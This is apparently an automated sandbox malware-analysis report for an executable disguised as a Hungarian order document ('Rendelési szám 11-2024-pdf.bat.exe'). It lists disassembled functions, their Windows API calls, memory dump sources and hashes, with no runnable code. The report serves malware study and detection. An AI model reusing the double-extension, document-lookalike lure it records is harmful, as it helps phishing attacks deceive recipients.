                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              • Opcode ID: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
                                              • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                              • Opcode Fuzzy Hash: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
                                              • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                              Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                              • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                              • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                              • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                              Function 00405B59 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrcatlstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 2659869361-3081826266
                                              • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                              • Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
                                              • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                              • Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD
                                              Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Close$Enum
                                              • String ID:
                                              • API String ID: 464197530-0
                                              • Opcode ID: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
                                              • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                              • Opcode Fuzzy Hash: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
                                              • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58
                                              Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                              • GetTickCount.KERNEL32 ref: 00402EAA
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                              • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                              • String ID:
                                              • API String ID: 2102729457-0
                                              • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                              • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                              • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                              • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                              Function 00405260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 0040528F
                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                              • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                              • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                              • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                              Function 00406152 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C6,80000002), ref: 00406198
                                              • RegCloseKey.ADVAPI32(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll), ref: 004061A3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID: Call
                                              • API String ID: 3356406503-1824292864
                                              • Opcode ID: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                              • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                              • Opcode Fuzzy Hash: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                              • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                              Function 0040586D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                              • CloseHandle.KERNEL32(?), ref: 004058A3
                                              Strings
                                              • Error launching installer, xrefs: 00405880
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                              • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                              • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                              • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                              Function 004038DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                              • GlobalFree.KERNEL32(?), ref: 00403900
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Free$GlobalLibrary
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 1100898210-3081826266
                                              • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                              • Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
                                              • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                              • Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8
                                              Function 00405BA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrlen
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 2709904686-224404859
                                              • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                              • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
                                              • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                              • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                              Function 6FBC10E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6FBC116A
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC11C7
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC11D9
                                              • GlobalFree.KERNEL32(?), ref: 6FBC1203
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              • Associated: 00000000.00000002.2603737645.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603777952.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603791388.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fbc0000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: f4b57fc440ab14c901d1c91339cc5f84c636162336d2534112105df77bec41ce
                                              • Instruction ID: e29740e0b0d246b7708236b72c4b99bb879a99ba026a0df3c060dfd5b6777852
                                              • Opcode Fuzzy Hash: f4b57fc440ab14c901d1c91339cc5f84c636162336d2534112105df77bec41ce
                                              • Instruction Fuzzy Hash: E831E7B6540641DFDB009F7AF945A6B77F8FB4AB20B09465AE840F7250E738E912C723
                                              Function 00405CDF Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                              • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                              • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                              • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

                                              Execution Graph

                                              Execution Coverage:0%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:100%
                                              Total number of Nodes:1
                                              Total number of Limit Nodes:0
                                              execution_graph 78164 335a2b60 LdrInitializeThunk

                                              Executed Functions

                                              Function 335A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3 335a35c0-335a35cc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ec4ed70d395ee0762cfc092da7d17072d0c7405b53c38aede26f6f4cf6e9a7f2
                                              • Instruction ID: ee6728bbf708afd8339a1a952a7767c0d1dcc2ef6fc49a56c8873da56dc3831b
                                              • Opcode Fuzzy Hash: ec4ed70d395ee0762cfc092da7d17072d0c7405b53c38aede26f6f4cf6e9a7f2
                                              • Instruction Fuzzy Hash: E990023170554842D50071585914706105547D0212F69D412A4425528D87958A5569A2
                                              Function 335A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 335a2b60-335a2b6c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 05227b08d0cbaee0d7978bc42b3a159b6ce1293f493d588d407623f1efc16341
                                              • Instruction ID: a40c2ca9967744ff22f89299eb6d13f17787fd5406bdde07349534fdae79c2b9
